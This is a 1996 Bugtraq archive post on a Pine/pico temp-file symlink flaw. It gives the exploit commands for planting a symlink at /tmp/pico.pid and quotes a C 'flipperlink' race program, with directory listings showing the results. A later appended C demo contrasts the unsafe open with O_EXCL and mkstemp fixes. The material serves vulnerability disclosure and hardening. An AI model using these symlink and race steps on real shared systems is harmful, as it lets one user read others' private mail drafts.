Bugtraq archives for 3rd quarter (Jul-Sep) 1996: Re: message rejected: Re: [linux-security] Pine security problem.

Re: message rejected: Re: [linux-security] Pine security problem.

Pascal A. Dupuis (dupuislei.ucl.ac.be)
Fri, 13 Sep 1996 10:07:19 +0200

Hello,
I got a bunch of messages in reply to Re: Pine Security problem. Here is a
summary:
First of all, the exploit is straightforward on Linux:
ln -s /tmp/hacker.tmp /tmp/pico.pid; touch /tmp/hacker.tmp;
The /tmp/hacker.tmp must be rw-rw-rw- (mode 666), and then everybody could
have a look at the composed message.
I also tried Rogier Wolff's suggestion about the flipperlink program,
running under high processor load to force swapping (compiling the kernel):
>#include <stdio.h>
>
>/* flip two names back and forth forever, so that the editor's
> * open() sees a symlink or a plain name depending on timing */
>int main (int argc, char **argv)
>{
>       if (argc != 3)
>               return 1;
>       while (1) {
>               rename (argv[1], argv[2]);
>               rename (argv[2], argv[1]);
>       }
>}
and run it with :
>       cd /tmp
>       ln -s hacker.tmp pico.pid
>       flipperlink pico.pid bla

Once the alternate editor is invoked, the hacker.tmp, if not
existing, is created 600, owned by the pine user. At this time, the toggle
stops working as long as the alternate editor is running.
The amazing fact is the ownership:
ls -l /tmp
lrwxrwxrwx   1 hacker   grp    10 Sep 13 09:49 bla ->hacker.tmp
-rw-------   1 dupuis   grp  3042 Sep 13 09:50 hacker.tmp
hacker> more blah
hacker>blah : permission denied
It is thus the ownership of the destination file which is used.
Greetings
Pascal A. Dupuis

--
Information Science is emerging from the Prehistoric Ages, but its
language still reflects it : gnu, hurd, awk, nroff, ls, ar, chmod, ...
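As an added illustration of the point in the message above (this is example code written for this archive page, not Pascal's code and not Pine/pico source): the fixed-name temp-file open that the post describes, next to the O_EXCL form that refuses a pre-planted symlink. It re-creates the "touch hacker.tmp; ln -s hacker.tmp pico.pid" setup inside a private mkdtemp() directory under /tmp rather than in /tmp itself; the directory template, file names and the "secret draft" content are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the post describes: the editor creates a fixed name such as
 * /tmp/pico.pid.  O_CREAT without O_EXCL follows whatever symlink an attacker
 * has planted at that name, so the draft lands in the link's target. */
int open_predictable_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened form of the same call: O_EXCL makes open() fail with EEXIST if
 * anything (a symlink included) already exists at that name. */
int open_predictable_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Re-creates the post's setup in a private mkdtemp() directory
 * (hypothetical template name), then opens pico.pid both ways.
 * Returns 1 if the unsafe open wrote through the link and the safe open
 * refused, 0 if either check did not behave that way, -1 on setup error. */
int demo_symlink_plant(void)
{
    char dir[] = "/tmp/picodemo.XXXXXX";
    char target[PATH_MAX], link[PATH_MAX], tmpl[PATH_MAX];
    static const char draft[] = "secret draft";   /* constructed content */
    int fd, unsafe_followed = 0, safe_refused = 0, rc = -1;
    struct stat st;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/hacker.tmp", dir);
    snprintf(link, sizeof link, "%s/pico.pid", dir);
    snprintf(tmpl, sizeof tmpl, "%s/pico.XXXXXX", dir);

    /* attacker: touch hacker.tmp (world-readable); ln -s hacker.tmp pico.pid */
    fd = open(target, O_WRONLY | O_CREAT, 0666);
    if (fd < 0)
        goto out;
    close(fd);
    if (symlink(target, link) != 0)
        goto out;

    /* victim, unsafe: open follows the link, the draft ends up in hacker.tmp */
    fd = open_predictable_unsafe(link);
    if (fd >= 0) {
        if (write(fd, draft, sizeof draft - 1) == (ssize_t)(sizeof draft - 1) &&
            stat(target, &st) == 0 && st.st_size == (off_t)(sizeof draft - 1))
            unsafe_followed = 1;
        close(fd);
    }

    /* victim, safe: O_EXCL refuses the pre-planted name with EEXIST */
    fd = open_predictable_safe(link);
    if (fd < 0 && errno == EEXIST)
        safe_refused = 1;
    else if (fd >= 0)
        close(fd);

    /* better still: mkstemp() picks an unpredictable name with O_EXCL semantics */
    fd = mkstemp(tmpl);
    if (fd >= 0) {
        close(fd);
        unlink(tmpl);
    }

    rc = (unsafe_followed && safe_refused) ? 1 : 0;
out:
    unlink(link);
    unlink(target);
    rmdir(dir);
    return rc;
}

int main(void)
{
    int r = demo_symlink_plant();
    printf("unsafe open followed the symlink and O_EXCL refused it: %s\n",
           r == 1 ? "yes" : "no");
    return r == 1 ? 0 : 1;
}
```

Note that the O_EXCL refusal holds even for a dangling link: POSIX requires open() with O_CREAT|O_EXCL to fail with EEXIST when the path names a symbolic link, regardless of what it points at, which is exactly the case the flipperlink toggle tries to hit. The ownership observation in the post (the file ends up owned by the pine user but with the mode of an existing target) follows from the same mechanism: the unsafe open writes into the attacker's pre-existing file rather than creating a new one.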